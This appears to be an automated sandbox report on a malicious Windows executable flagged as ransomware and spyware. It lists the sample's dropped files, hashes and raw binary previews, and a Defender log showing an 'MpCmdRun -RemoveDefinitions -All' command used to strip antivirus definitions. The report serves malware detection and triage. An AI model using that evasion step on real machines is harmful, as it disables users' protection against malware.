Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	sppawx.exe
Detection:	MAL
Classification:	mal100.rans.troj.adwa.spyw.expl.evad.winEXE@198/57@4/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 88% Number of executed functions: 143 Number of non-executed functions: 175
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 172.217.19.227, 13.107.246.63, 20.12.23.50
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, gstatic.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target mshta.exe, PID 8124 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 7596 because it is empty
Execution Graph export aborted for target powershell.exe, PID 8072 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: sppawx.exe

Simulations

Behavior and APIs

Time	Type	Description
02:37:59	API Interceptor	8x Sleep call for process: WMIC.exe modified
02:38:00	API Interceptor	116x Sleep call for process: powershell.exe modified
02:38:53	API Interceptor	1x Sleep call for process: MpCmdRun.exe modified

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Reputation:	unknown
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\ ? ? \Display (1).png

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	675537
Entropy (8bit):	7.922831844016598
Encrypted:	false
SSDEEP:	12288:0128IF8B5PaYu4fkBmXrwbPF/dgA3nOotevoVvd6q6PbDJErO:0AtmN7kbPF/dgA3eQVvmvj
MD5:	3E9E7A98499486C6B4D4DC267014DD2A
SHA1:	E969F27F10D6D160471F8071514FED41F711A453
SHA-256:	1E771486D47AC8217D2592793ACEFE72FBC0129147583115E5DDE64D425F6557
SHA-512:	6C29373E74DD1341C7061B78001358D88DA52D5F4092EE98EC0EEBD52927573CDDC355979B73845F5C7BDE226D991F0B000CCB3445563E65D2B5A3E79E240A9F
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.....Wy..Fd.,.j....}.m.t.s.v......+.`....y... f..'3..T .1Ib..`.A..<.3.@.y(..Y........;......D.Z..{..wDf.A....w:.>.&..xd.9wL.E[..:.t..8t...........\|.{..=....n.^.d1.t......R.3...+6.t.t?.0:.z`AL........O.I.wNL.)..J..\|.....?..;...zt?...{l.t>z......~xC....~...1.......9Q....XLUt.{.........}.,..u(S..y...#.9...~K...n....4/.oY...91........e.b.oo..?3.0..\...o..e...Y.....8...2....\W.~u..W...b.^s}...Z.z..C.m.Z._O.S..f....e......Nw.U...+..&-[{.,._~Ua.eW....U.9..e..s.`...C.H..e..<...s\|:.g*......,.Y>.....}.e...^zy.[......./.4M...s."...-?...[......r.0..{..ij.KRw..Sg.......cZ.....tyZ.kV.q9.\...<..}A....t........XC...{qZ._>....>9.....^...U.^.V....s.e\.o.O>w..Rw...8.W.>{._.........b..Yy..qN.[..e.....^Fb.W.uE....u~..Vl.....{.[`....#.w....S..]....&.9....+.u.v...?..s..Ng..........xV...sX.k>....r.g...9....v.u;...w....T'...r.v....z.mNK...,u...(1....,r

C:\Users\user\AppData\Local\Temp\7VKXZ.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe
File Type:	RAR archive data, v5
Category:	dropped
Size (bytes):	692670
Entropy (8bit):	7.999787043646737
Encrypted:	true
SSDEEP:	12288:0ZBSWI4oWwqo/Kc8MX9rqNVVU0VvMnoUt4dQif1zMLIydp/CLm4COKBchvKyAm+:OMAoWwqo/Tb9r70VvQFt4d9f1GIydl6k
MD5:	C3D4563DCF5A4009AE8791ADA9F5218B
SHA1:	8290DA0609D2A5B737D2CA8D5F0009896D995B67
SHA-256:	7F9EADC16FD82073F7508C69D206A7948B99353468494293B56DA4751753FA10
SHA-512:	331292B831AB4A6BFFB3B930E60D3E7285F16B6CA0FB7B15CFEE2E916D2ED9DB271A906B8C8C37905BA134A82252A20F17EAF5C6E7D3A05A7B9AE744630D17C4
Malicious:	true
Reputation:	unknown
Preview:	Rar!.....e.a!.....Yg.f..9-#(:p...&..."I.../..c.......,]TGh.6.Tn..t.E^..(.K..]{..g.....g=..z[..[n..a.DF.>7..(....jR......t......~}.Sy.@z.pbw...?.F..t..V9=;?.....'.lq.;..4{....__....A.,..o.`......9...) .&.Z......d..Xk.%..`R...Y.....R...S...=.....'..JU.%..X.@..\V...F...T.D..~...a.d..........t@.>.....U......f.7R?....j...yn~....0.[..h.+...../..E..).(..U}vb5....H1st..)...r..1....W.....JQr....mL..!..l.........9Hm...:_+K,.......<......z B.x3..deQ..<..<..Z+D..s...O.iF8....30.U..OE.7/o......~....d.....Q..D.C..%{...Sr.4<...l.5.g.<.4.J......0..b..wgd.P.{.....K..v.87yxP..C......:.......1.V!.$.G..G&{-.ql.\...JH..-v!.Vz.&5.U.r.....o..W...G(o=.,..).T2I.E8.C.......P.-......R9v...........d.~....Z.n.R.S.]..........z.l.z^.j.t..`.Xhx.S..P.P....u.#&P./...Q..p.8.....$..qRu.u.Q...+.G\.....P.G.....h....BY.d.Y.....;."1N.@....4..Y...7.....x...7..7R....!!`q....2..l[S\8...h(A.F......PA....wY1..<.+......O'...{W.3..[...G7.....7...e...K&....?...e........Q.].W.....3..2..&A...

C:\Users\user\AppData\Local\Temp\MpCmdRun.log

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	894
Entropy (8bit):	3.107468882489664
Encrypted:	false
SSDEEP:	12:Q58KRBubdpkoPAGdjrN7K/Ubk9+MlWlLehW51IC07K/U2:QOaqdmOFdjrc/Z+kWResLIE/z
MD5:	3DFEAE2098C9C549BC76F897D88942D8
SHA1:	0CE43BF38FC7AD2EF780DF2278345ECB9B4941AB
SHA-256:	DB14EDEB6E83C80719CF4D3B88B185FAE13BF9AB9F412D6CD4E7C5CDEF7D9B15
SHA-512:	B4EC29062C2530DF420F6E825B36A573671CC95885BFAD8BDCD7251DD5379711B4FEC777A8D58F050EE95C4FE0828B48B117A6CC9EEEF8743EE72A48481A6F77
Malicious:	false
Reputation:	unknown
Preview:	..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. D.e.c. .. 1.3. .. 2.0.2.4. .0.2.:.3.8.:.1.0.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. F.r.i. .. D.e.c. .. 1.3. .. 2.0.2.4. .0.2.:.3.8.:.1.0.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

C:\Users\user\AppData\Local\Temp\RESA7D9.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Fri Dec 13 09:06:02 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1372
Entropy (8bit):	4.125121102328959
Encrypted:	false
SSDEEP:	24:HXGFq9sWc5LSUTcH8FwK2cnKNII+ycuZhNtakSbPNnqS+d:3GnctcmKdnKu1ulta3RqSe
MD5:	387CBC0925ECEC3EB79E8A6B510AF49E
SHA1:	A82EB7064BDD5E299DDD3339473D9F6B9488B827
SHA-256:	DD817D0311237A5495C4BD3E678273AC93B65AD55E8ABB64D1EBE7930BBFA938
SHA-512:	603B4DDB40FCDD00E8C99D81EB4FD3C1D087E8E40F6C35C8675FCC306F38E1CB881846B6B40ED640C39D0E6BDBD4FFE2AB7C10547723BAFA1A9541E6BC05B588
Malicious:	false
Reputation:	unknown
Preview:	L.....[g.............debug$S........x...................@..B.rsrc$01........X.......\...........@..@.rsrc$02........P...f...............@..@........T....c:\Users\user\AppData\Local\Temp\vebzhwcp\CSCD4517BE1E6C4428293E27562A6116680.TMP................Dq.N(P\|..oTu.............4.......C:\Users\user\AppData\Local\Temp\RESA7D9.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.e.b.z.h.w.c.p...d.l.l.....(.....L.e.g.a.

C:\Users\user\AppData\Local\Temp\_MEI78082\VCRUNTIME140.dll

Download File

Process:	C:\Users\user\Desktop\sppawx.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	109392
Entropy (8bit):	6.641929675972235
Encrypted:	false
SSDEEP:	1536:GcghbEGyzXJZDWnEzWG9q4lVOiVgXjO5/woecbq8qZHg2zuCS+zuecL:GV3iC0h9q4v6XjKwoecbq8qBTq+1cL
MD5:	4585A96CC4EEF6AAFD5E27EA09147DC6
SHA1:	489CFFF1B19ABBEC98FDA26AC8958005E88DD0CB
SHA-256:	A8F950B4357EC12CFCCDDC9094CCA56A3D5244B95E09EA6E9A746489F2D58736
SHA-512:	D78260C66331FE3029D2CC1B41A5D002EC651F2E3BBF55076D65839B5E3C6297955AFD4D9AB8951FBDC9F929DBC65EB18B14B59BCE1F2994318564EB4920F286
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........u...u...u.E.t...u.....u...t...u..v...u..q...u..p...u..u...u......u..w...u.Rich..u.........PE..d..._#;..........." ...".....`......................................................=.....`A........................................`C..4....K...............p.......\..PO...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......D..............@....pdata.......p.......H..............@..@_RDATA..\............T..............@..@.rsrc................V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI78082\_bz2.pyd

Download File

Process:	C:\Users\user\Desktop\sppawx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	49944
Entropy (8bit):	7.78315600372484
Encrypted:	false
SSDEEP:	1536:U/onT0xi3xXtfwYf5CVW3Bd7IGCVwU7SyixL7:U/k538e5CIRlIGCVwUO7
MD5:	85C70974FAC8E621ED6E3E9A993FBD6F
SHA1:	F83974E64AA57D7D027B815E95EBD7C8E45530F1
SHA-256:	610983BBCB8EE27963C17EAD15E69AD76EC78FAC64DEB7345CA90D004034CDD6
SHA-512:	142792750E4A5189DBEAA710E3F5B3689D593927EA77DED00EB5CAADA6B88D82A37459770845F1EA7C9F45DA5A6AE70E19BFCF76D9F1A56184C3164B736BCB18
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w.l.3...3...3...:...9......1......0......>......;......7.......0...x...1...3...l.......;.......2.......2.......2...Rich3...................PE..d...f..e.........." ...#.............e....................................................`.............................................H.................... ..,...................................................q..@...........................................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI78082\_ctypes.pyd

Download File

Process:	C:\Users\user\Desktop\sppawx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	60696
Entropy (8bit):	7.822236524949101
Encrypted:	false
SSDEEP:	1536:WbK/YBHE2gCtX+/9zyeoVIkwLMzKep8z+IGLPAt7SyWxU:WGAK2ghtGIk6MeeGyIGLPAtz
MD5:	E7EF30080C1785BAF2F9BB8CF5AFE1B2
SHA1:	B7D7D0E3B15DE9B1E177B57FD476CECBDD4FCB79
SHA-256:	2891382070373D5070CB8FD6676AFC9F5EB4236251F8FC5C0941AF0C53A2D31E
SHA-512:	C2EC431D2821879BB505D8ECA13FA3921DB016E00B8674FA62B03F27DC5CEE6DD0DE16BA567D19D4B0AF9A5CB34D544383A68CC63FF2FA9D8BB55E356D0D73E6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......>...z.z.z.s...\|....x....v....r....~.....x.1...{.1...\|.....y.z.......\|.....{...o.{.....{.Richz.................PE..d...c..e.........." ...#.............-.......................................P............`.........................................HL.......I.......@.......................L.......................................9..@...........................................UPX0....................................UPX1................................@....rsrc........@......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI78082\_decimal.pyd

Download File

Process:	C:\Users\user\Desktop\sppawx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	108312
Entropy (8bit):	7.9301662560961494
Encrypted:	false
SSDEEP:	3072:HnHQe/FKYjTnmuJkv4D5ZIBGeKHC6ajQ6BWIGOqmbtbb9:HnHQe/MYjTnDJRX6Ge16ehbhx
MD5:	3923E27B9378DA500039E996222FFEE6
SHA1:	A9280559A71ABF390348E1B6A0FB1F2409649189
SHA-256:	0275B03041F966E587D1C4C50266C3FDFF1E1A65F652AD07B59CB85845B5457E
SHA-512:	051C613403FD80B9582DD48C1F38870CB26846D54B75603EA52A78202A72272107E95750DE78CD8F6C56951EBDE501B4892D90FB306326B86124C8CC97BCA594
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@.R.!...!...!...Y=..!..+]...!..+]...!..+]...!..+]...!..M\...!...Y...!...!...!..M\...!..M\...!..M\...!..M\Q..!..M\...!..Rich.!..........PE..d...T..e.........." ...#.p...................................................0............`..........................................,..P....)....... ...........'...........-..........................................@...........................................UPX0....................................UPX1.....p.......f..................@....rsrc........ .......j..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI78082\_hashlib.pyd

Download File

Process:	C:\Users\user\Desktop\sppawx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	36120
Entropy (8bit):	7.670480771561197
Encrypted:	false
SSDEEP:	768:6EKW7574DsajR20fnfPHz8HLP8pfbnIGOINg5YiSyvIAMxkE3n1:jKW7hq00fnTQEbnIGOINy7Sy+xzn1
MD5:	C8B153F0BE8569CE2C2DE3D55952D9C7
SHA1:	0861D6DCD9B28ABB8B69048CAF3C073E94F87FDC
SHA-256:	AF9F39D2A5D762214F6DE2C8FEC0A5BC6BE0B8223EF47164CAA4C6E3D6437A58
SHA-512:	81CCBFFF0F4CDD1502AF9D73928B940098B9ACC58B19C1A939ECDF17418096294AF4A4529EE7A0BBE1C686E3B0254651E211C1093264D1835065A82711AC0379
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........u...&...&...&.U&...&u..'...&u..'...&u..'...&u..'...&...'...&...'...&...&M..&...'...&...'...&..9&...&...'...&Rich...&........PE..d......e.........." ...#.P.........../.......................................P............`.........................................\|K..P....I.......@.......................K.......................................;..@...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........@.......R..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI78082\_lzma.pyd

Download File

Process:	C:\Users\user\Desktop\sppawx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	87832
Entropy (8bit):	7.917277859124498
Encrypted:	false
SSDEEP:	1536:cjQY6vZR307kwHMn3NsbM5PlvQzSqoSdPN1uruZkU2D90nGt4pcgIGZ1rA7SyTx7:EQY6nEZe3NsbI1QzSwlaugudNIGZ1rAP
MD5:	BC2EBD2A95619AB14A16944B0AB8BDE5
SHA1:	C31BA45B911A2664FC622BB253374AB7512FC35A
SHA-256:	AEB3FD8B855B35204B5088C7A1591CC1CA78FFFE707D70E41D99564B6CB617C6
SHA-512:	86A6685EFEC72860991C0F0FA50F46A208211D3F8FC44012B12437D141C5F1A24C34A366F164D225869680707B482AB27A2720C698EBE8026F1C5807E81F8437
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........TB#.5,p.5,p.5,p.M.p.5,p.I-q.5,p.I)q.5,p.I(q.5,p.I/q.5,pnH-q.5,p.M-q.5,p.5-p.5,pnH!q.5,pnH,q.5,pnH.p.5,pnH.q.5,pRich.5,p........PE..d......e.........." ...#. ...............................................................`.........................................4...L....................P.........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI78082\_queue.pyd

Download File

Process:	C:\Users\user\Desktop\sppawx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26904
Entropy (8bit):	7.418027428269828
Encrypted:	false
SSDEEP:	768:Xzh/iDHAPcpqyIGQUNz5YiSyvHAMxkEJ5YSv:jhiDHAP5yIGQUN97SyPx/Y+
MD5:	FCBB24550F59068A37EA09A490923C8A
SHA1:	1E51D9C156354E00909C9F016DDB392A832F8078
SHA-256:	DE2AC6D99234A28DCF583D90DCA7256DE986FCA9E896C9AAFD1F18BB536978B8
SHA-512:	62474BF9D5F39591240F71FD9270FCC7A2B2C0B4A1F93CBB57021040AD85B3AB8C401D17AEDF0141105118772F453C6137A026736F069CC7A965CB30E5479F07
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B:W\.[9..[9..[9..#...[9..'8..[9..'<..[9..'=..[9..':..[9..&8..[9.M#8..[9..[8.M[9..&4..[9..&9..[9..&...[9..&;..[9.Rich.[9.........................PE..d...Y..e.........." ...#.0...............................................................`.............................................L.......P............`..............<..........................................@...........................................UPX0....................................UPX1.....0.......*..................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI78082\_socket.pyd

Download File

Process:	C:\Users\user\Desktop\sppawx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	45336
Entropy (8bit):	7.7177626825594965
Encrypted:	false
SSDEEP:	768:O1X8HEfobVbgwsIZsQD182/q2vQttkmnIzPnzTpwOgIGLwgBT5YiSyvvBAMxkEn:CXz0gwsGsQD1ZbmiSOgIGLwgBd7SyZxL
MD5:	F6D0876B14BCA5A264EC231895D80072
SHA1:	D68B662CFC247C07851EF0764FE9652E3E2C0981
SHA-256:	BCBF9A952473E53F130CE77B0DB69FE08C5845CE10DBE8C320B40F171A15D6A8
SHA-512:	1DB02975634FFCC4E73FAC355D7F67A915C3B4189FEAF9E7B24EF831E9F4A2E60A4BD1EBFD8157282A4094814332D62957FCD204B20F2904527E203AB355AB8E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J./.+z\|.+z\|.+z\|.S.\|.+z\|.W{}.+z\|.W.}.+z\|.W~}.+z\|.Wy}.+z\|}V{}.+z\|.+{\|.+z\|.S{}.+z\|}Vw}.+z\|}Vz}.+z\|}V.\|.+z\|}Vx}.+z\|Rich.+z\|................PE..d......e.........." ...#.p.......... q....................................................`.........................................D...P....................0......................................................0}..@...........................................UPX0....................................UPX1.....p.......p..................@....rsrc................t..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI78082\_sqlite3.pyd

Download File

Process:	C:\Users\user\Desktop\sppawx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	59160
Entropy (8bit):	7.835515959807496
Encrypted:	false
SSDEEP:	1536:e5ovI/e3wTAiHXhchuXbLfbmmKTnjBChRDLHKVIGOQQm7Syxx2e:e5fXAcew9KTjBCh1kIGOQQml
MD5:	0FDEDCB9B3A45152239CA4B1AEA4B211
SHA1:	1CCFF1F5E7B27C4156A231AD7A03BCC9695C5B92
SHA-256:	0FC03D25467850181C0FC4F0F8919C8C47CBA2BF578698D4354AA84FD810C7F7
SHA-512:	8CE5B38EE64AC0CDA831B6B2C746FB95BAADDA83665D8E125EAA8B4A07CB61B3EF88D60741B978B2108EC08B067F1C9C934099F539B1E24F55E3CA8350359611
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@.g...g...g.......g..../..g......g....+..g....*..g....-..g..q./..g..../..g...g/..f..q.#..g..q....g..q...g..q.,..g..Rich.g..........PE..d......e.........." ...#.........p.. ........................................@............`..........................................;..P....9.......0..........8............;...................................... %..@...........................................UPX0.....p..............................UPX1................................@....rsrc........0......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI78082\_ssl.pyd

Download File

Process:	C:\Users\user\Desktop\sppawx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	67352
Entropy (8bit):	7.856108604878049
Encrypted:	false
SSDEEP:	1536:URuyAdinkEweTTDWPnQfNnPAdu8LfPXrBIGC777m7Synx5:2F9fEo58DPXdIGC77yN
MD5:	53996068AE9CF68619DA8CB142410D5E
SHA1:	9EB7465D6F22AB03DAC04CFCE668811A87E198F2
SHA-256:	CBD320C42277086CD962FD0B25842904CEB436346D380319625F54363F031DCF
SHA-512:	D5FBC53A2FFFECB1F3DA4B126E306961DE3B8070B5F722B6ED5E20BEF6AF48D52EDF96C975F68278E337BC78A25B4227E9EB44B51BAA786365A67CF977E4643E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U.k.4.8.4.8.4.8.L)8.4.8.H.9.4.8.H.9.4.8.H.9.4.8.H.9.4.8kI.9.4.8.4.8#5.8.L.9.4.8kI.9.4.8kI.9.4.8kIE8.4.8kI.9.4.8Rich.4.8........................PE..d......e.........." ...#.........@.......P...................................0............`.........................................l,..d....)....... ..........8............,..........................................@...........................................UPX0.....@..............................UPX1.........P......................@....rsrc........ ......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI78082\base_library.zip

Download File

Process:	C:\Users\user\Desktop\sppawx.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1329520
Entropy (8bit):	5.586655762137983
Encrypted:	false
SSDEEP:	12288:uttcY+b+vOmgRF1+fYNXPh26UZWAzCu7j5D95wdgkVodYOPjwwMJ9gCCaYc2I:uttcY+mHCiCA5TNqodYOPEPEaYc2I
MD5:	898E35281A756640780DBC31A0B78452
SHA1:	845B59CFD9FB152725F250A872E9D1D7A66AF258
SHA-256:	0DAA440C78582A693DABBC2325A06D817131BB170BAD436B126BAD896F1377CD
SHA-512:	421CC4A15E94293E53F1039B8BB5BE7EDCBC8E3E0E4ABC7F34FAF991993F51CB5F51493B58BB341CB9579347EC134B02104454075A8E7E33E45B8E3A66A44D79
Malicious:	false
Reputation:	unknown
Preview:	PK..........!.x[_C............_collections_abc.pyc......................................Z.....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.............Z...e.d.........Z.d...Z...e.e.........Z.[.g.d...Z.d.Z...e...e.d.................Z...e...e...e.........................Z...e...e.i.j%..........................................Z...e...e.i.j)..........................................Z...e...e.i.j-..........................................Z...e...e.g.................Z...e...e...e.g.........................Z...e...e...e.d.........................Z...e...e...e.d.d.z...........................Z...e...e...e.........................Z...e...e.d.................Z ..e...e.d.................Z!..e...e...e"........................Z#..e.i.j%..................................Z$..e.i.j)..................................Z%..e.i.j-..................................Z&..e.e.jN..........................Z(..e...d...................Z)d...Z..e........Z..e.e........Z+ejY............................[d...Z-..e-........

C:\Users\user\AppData\Local\Temp\_MEI78082\blank.aes

Download File

Process:	C:\Users\user\Desktop\sppawx.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	113107
Entropy (8bit):	7.743321261692021
Encrypted:	false
SSDEEP:	1536:99JWGY9ylSjwUnbh70LlwGxKB3huvEKAxC+7n6CttfsEesRAE2+b0SOQGrs0n+VQ:89J0UKpKBRuvMg+j6+F/2AOJw0veNNQ5
MD5:	84B67E959E5E5AB383E347EBD19B3C08
SHA1:	B483E960E79872303D7D7EADC7428B573AE6D7BB
SHA-256:	D6FD956FDEBA6D7183EFEE08EA6AF44060234361EBABA59E02D26754403220E8
SHA-512:	393C6C303653ED71CF7EE1320730B19DA9428EAB9D01EC7489930CCEDFB4433C07C09F91C9854C9E28A0FAB9615922D39FB6A35E29F2BAA12609AAE51DA64360
Malicious:	false
Reputation:	unknown
Preview:	PK........]..Y...1]...].......stub-o.pyc........cfUg.................................e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z.d...Z.d.Z.....e...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j.......

C:\Users\user\AppData\Local\Temp\_MEI78082\libcrypto-3.dll

Download File

Process:	C:\Users\user\Desktop\sppawx.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1629464
Entropy (8bit):	7.952620301087112
Encrypted:	false
SSDEEP:	49152:AMyDwbv70aKbP1zkLO5YHLA1CPwDvt3uFlDCZ:kwbv77KbPaqYHLA1CPwDvt3uFlDCZ
MD5:	27515B5BB912701ABB4DFAD186B1DA1F
SHA1:	3FCC7E9C909B8D46A2566FB3B1405A1C1E54D411
SHA-256:	FE80BD2568F8628032921FE7107BD611257FF64C679C6386EF24BA25271B348A
SHA-512:	087DFDEDE2A2E6EDB3131F4FDE2C4DF25161BEE9578247CE5EC2BCE03E17834898EB8D18D1C694E4A8C5554AD41392D957E750239D3684A51A19993D3F32613C
Malicious:	false
